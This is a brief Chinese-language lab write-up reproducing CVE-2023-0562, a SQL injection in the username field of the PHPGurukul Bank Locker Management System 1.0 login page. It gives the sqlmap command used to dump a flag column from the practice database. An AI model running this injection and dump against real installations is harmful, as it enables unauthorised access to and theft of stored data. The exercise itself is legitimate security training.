CVE-2023-0562银行储物柜管理系统登录页面sql注入漏洞靶场复现

在PHPGurukul银行储物柜管理系统1.0中发现了一个漏洞。它被评定为临界状态。受此问题影响的是组件登录的文件index.php的一些未知功能。对参数username的操作会导致sql注入。攻击可能是远程发起的。该漏洞已被公开，并可能被利用。此漏洞的标识符是VDB-219716。

抓登录包放salmap里跑

爆flag
python sqlmap.py -r bao\4.txt -D blmsdb -T fllllaaaag -C flag --dump